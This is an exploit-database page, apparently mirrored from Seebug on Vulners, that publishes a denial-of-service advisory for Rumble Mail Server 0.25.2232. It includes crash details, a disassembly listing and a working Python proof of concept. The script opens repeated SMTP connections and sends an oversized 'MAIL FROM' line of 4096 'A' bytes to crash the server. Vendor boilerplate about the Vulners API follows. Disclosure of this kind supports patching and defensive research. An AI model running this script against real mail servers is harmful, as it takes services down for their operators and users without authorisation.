Lucene search
K

Rumble 0.25.2232 Denial of Service Vulnerability

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 18 Views

Rumble 0.25.2232 Denial of Service Vulnerability, serious threat level, exploit to crash Rumble Mail Server v0.25.223

Code

                                                # ------------------------------------------------------------------------
# Software................Rumble 0.25.2232
# Vulnerability...........Denial Of Service
# Threat Level............Serious (3/5)
# Download................http://humbedooh.users.sourceforge.net/
# Discovery Date..........3/27/2011
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................AutoSec Tools
# Site....................http://www.autosectools.com/
# Email...................John Leitch <[email protected]>
# ------------------------------------------------------------------------
# 
# 
# --Description--
# 
# A denial of service vulnerability can be exploited to crash Rumble
# Mail Server v0.25.2231.
# 
# rumble_win32.exe: The instruction at 0x96CEEB referenced memory at
# 0x41414149. The memory could not be read (0x0096CEEB -> 41414149)
# 
# Disassembly:
# 
# .text:0096CEEB mov     edx, [ecx+8]
# .text:0096CEEE mov     [ebp-8], edx
# .text:0096CEF1 mov     eax, [ebp-8]
# .text:0096CEF4 mov     ecx, [eax]
# .text:0096CEF6 mov     [ebp-0Ch], ecx
# .text:0096CEF9 mov     edx, [ebp+0Ch]
# .text:0096CEFC mov     [ebp-10h], edx
# .text:0096CEFF
# .text:0096CEFF loc_96CEFF:                             ; CODE XREF: .text:0096CF31
# .text:0096CEFF mov     eax, [ebp-10h]
# .text:0096CF02 mov     cl, [eax]
# .text:0096CF04 mov     [ebp-11h], cl
# .text:0096CF07 mov     edx, [ebp-0Ch]
# .text:0096CF0A cmp     cl, [edx]
# .text:0096CF0C jnz     short loc_96CF3C
# 
# 
# --PoC--

import socket

host = 'localhost'
tld = 'mydomain.tld'
port = 25

def crash():    
 for i in range(0, 16):
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((host, port))
  s.settimeout(32)    
  
  junk = 'A' * 4096
  
  print s.recv(8192)
  s.send('HELO ' + tld + '\r\n')
  print s.recv(8192)
  s.send('MAIL FROM ' + junk + '\r\n') 
  print s.recv(8192)
  
  s.close()
 

crash()
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
18